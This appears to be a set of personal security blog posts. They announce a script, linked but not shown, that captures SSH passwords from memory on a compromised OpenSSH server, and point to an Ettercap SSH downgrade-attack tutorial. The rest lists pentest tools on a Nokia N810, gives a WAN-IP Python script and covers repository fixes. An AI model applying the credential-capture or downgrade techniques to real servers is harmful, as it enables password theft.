#!/zitstif.no-ip.org/

A while ago, I read an article regarding SSH2 and an insecurity that it possessed. Being a person who depends on SSH2, I was highly intrigued about this insecurity.

The insecurity involves with the handling of credentials in memory when a client is connecting to an openssh server. When the client is authenticating to the server, on the server side, the password in memory is in clear text. So, this attack is merely a local one. For one to worry about this attack, they would have to have their openssh server compromised and the would attacker run the shell script that I wrote.

I’m not taking credit for the discovery of this flaw. I merely wrote a program to automate the capture of the ssh client’s credentials. Once I find the discoverer of the flaw, I will post it. Keep in mind that this program isn’t perfect, but it does work.

Here’s the program in plain text:
http://zitstif.no-ip.org/capturessh2.txt

Here’s the program in a tar file:
http://zitstif.no-ip.org/capturessh2.tar

MD5sum: f9ebfe85ff73641f06625a8c21261d4f

#Tested to work on SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
#Tested to work on SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1
#Tested to work on OpenSSH 5.2 (protocol 2.0) Fedora 11

If you want to test this on your ssh server, first log into your ssh server and then execute the script with sudo.

Then posing as the victim yourself, login to the same ssh server and do your usual business and then log out.

In the attacker’s console, you will see the victim’s user name and password that the used to authenticate in the ssh server.

Also a quick side note, I’m reminded of a pretty nasty attack on ssh clients that can be performed with Ettercap. It’s known as a downgrade attack. Essentially, instead of the client authenticating through the Protocol 2.0 version of SSH, the attacker modifies the traffic in transmit and downgrades it to Protocol 1.0, which is susceptible to password sniffing via Ettercap.

Here’s a link to a tutorial on how to perform this attack:
http://openmaniak.com/ettercap_filter.php

This attack only affects servers that allow ssh 1.0 authentication, ergo it’s not a very high level of threat.

If you are one of the very very few to remember a shell script that I wrote a while back that let’s you know your WAN IP address from the command line (ipchicken), I wrote a replacement for it in python. I hope this is useful to you:

ipchicken.py

#!/usr/bin/env python
import re
import urllib
import socket
import sys

#Test that ipchicken.com is up#
var = socket.socket()
try:
        var.connect(('www.ipchicken.com', 80))
        var.close()
except socket.error:
        var.close()
        print "www.iphicken.com seems to be down.."
        sys.exit(1)

var = urllib.urlopen('http://www.ipchicken.com')
var = str(var.readlines())

reg = "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"

for ip in re.findall(reg, var):
        print """Your WAN IP address is: %s \nBrought to you by www.ipchicken.com""" % ip
sys.exit(0)

Also, the beauty behind this, is that all you need is python and it should work on any operating system that supports python.

Of course, if you have dog for Linux, then you can get the same affect with just a quick one liner:

dog http://www.ipchicken.com | egrep -wo "[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}"

http://www.google.com/search?hl=en&source=hp&q=dog+is+better+than+cat+linux&aq=f&oq=&aqi=

Last December I acquired a Nokia N810 internet tablet. Now for those of you who aren’t familiar with this device, the Nokia N810 is an internet tablet that you can use for web browsing, listening to music, reading e-books, VOIP calls or what have you. In the end it’s basically a pocket sized computer.

For more detailed information please view: http://en.wikipedia.org/wiki/Nokia_N810

The main reason why I had interest in this device, was due to a certain time when I was browsing the web, and I stumbled upon this Irongeek page.

I thought to myself, “Well how cool is that? This is essentially a poor man’s Iphone that has a keyboard and is Linux based. Also, getting one used on Ebay would cost < 200 dollars.”

After making the final decision and purchasing one for a mere $176, I quickly turned it into a portable pentesting machine!

To gain root is trivial, just install this:

http://maemo.org/downloads/product/OS2008/rootsh/

Here’s a list of some of the applications that I’ve put on my Nokia N810:

aircrack-ng
btaudit
btscanner
ettercap
hcitool
kismet
l2ping
minicom
ncat
ncftp
ndiff
netcat
nikto (downloaded from cirt.net)
nmap
python
rdesktop
rfcomm
roxterm
ruby
sdptool
socat
ssh (client)
sshfs
tcpdump
telnet
traceroute
vncviewer
wget

This device though, hasn’t been without its headaches. I remember reading a warning on a website, that warned about installing duplicate repositories on your OS2008 (Diablo). Also here’s a link to a huge list of repositories that have these oh so useful tools (which has the warning):

http://www.gronmayer.com/it/

By mistake at a later time, I eventually did install a duplicate repository. After doing so, I wasn’t able to install anything and performing an ‘apt-get update’, would yield errors that pointed towards having duplicate repositories being installed. Along with that, the application manager and apt were incredibly slow to the point where I lost patience. It was time to take a peak at the sources.list and do some Googling.

Firstly, if you’re use to Debian based Linux distributions, you can find the sources.list file in /etc/apt/sources.list , but for Maemo, the path to the sources.list file is: /etc/apt/sources.list.d/hildon-application-manager.list

I also noticed that repository.maemo.org was not responding at all what so ever. Even now, you can’t resolve the host name. After some searching I found:

http://talk.maemo.org/showthread.php?t=13721

It seems silly, but to get respository.maemo.org to respond you have to do the following as root on your Nokia N810:

echo "62.61.85.32 repository.maemo.org" >> /etc/hosts

I also, noticed that a bunch of repositories were timing out when I would run ‘apt-get update’. So to do a quick test on the repository lists I wrote a very small one liner to ping each repository.

for i in $(cat /etc/apt/sources.list.d/hildon-application-manager.list | awk '{print $2}' | cut -d'/' -f3); do ping -c1 $i 2>&1; done  >> repfix.log

I then, used ‘grep’ to look through ‘repfix.log’ and searched for ‘bad’, which revealed domain names that responded in the manner of ‘ping: bad address’. This gave me a list of repositories that were no longer up.

I used vi as root to remove the repositories that were no longer up in /etc/apt/sources.list.d/hildon-application-manager.list.

Lastly, I ran ‘apt-get update’ as root and I no longer had any issues. Along with that, I could install applications again!

Here’s a list of the repositories that are working for me, hopefully this might save you a head ache or two, if you’re a tweaker of the Nokia N810:

deb http://catalogue.tableteer.nokia.com/certified/ diablo user
deb http://catalogue.tableteer.nokia.com/non-certified/ diablo user
deb http://catalogue.tableteer.nokia.com/updates/diablo-2/ ./
deb http://repository.maemo.org/extras/ diablo free non-free
deb http://repository.maemo.org/extras chinook free non-free
deb http://www.fbreader.org/maemo diablo user
deb http://p.quinput.eu/debfarm chinook user
deb http://qole.org/repository maemo main
deb http://www.mulliner.org/nokia770/repository/ chinook free
deb http://browser-extras.garage.maemo.org/browser-extras/ chinook browser-extras
deb http://sanker.info/mend0za/maemo/tkabber bora tkabber
deb http://maemo.shmuma.ru/repo/ chinook free
deb http://repository.maemo.org/ chinook free non-free
deb http://packages.gizmoproject.com/chinook chinook user
deb http://reg.fring.com/repository/ chinook release
deb http://repository.maemo.org/extras/ diablo free
deb http://stage.maemo.org/extras/ chinook free non-free
deb http://stage.maemo.org/ chinook free non-free

Also, here’s a copy of my /etc/hosts file:

127.0.0.1 Nokia-N810-43-7 localhost
62.61.85.32 repository.maemo.org

Feb 13, 2010: UPDATE!:

Now it is unnecessary to edit your hosts file to mend the respository.maemo.org resolution issue.

host repository.maemo.org
repository.maemo.org is an alias for repository.maemo.org.edgesuite.net.
repository.maemo.org.edgesuite.net is an alias for a515.g.akamai.net.
a515.g.akamai.net has address 198.63.194.139
a515.g.akamai.net has address 198.63.194.161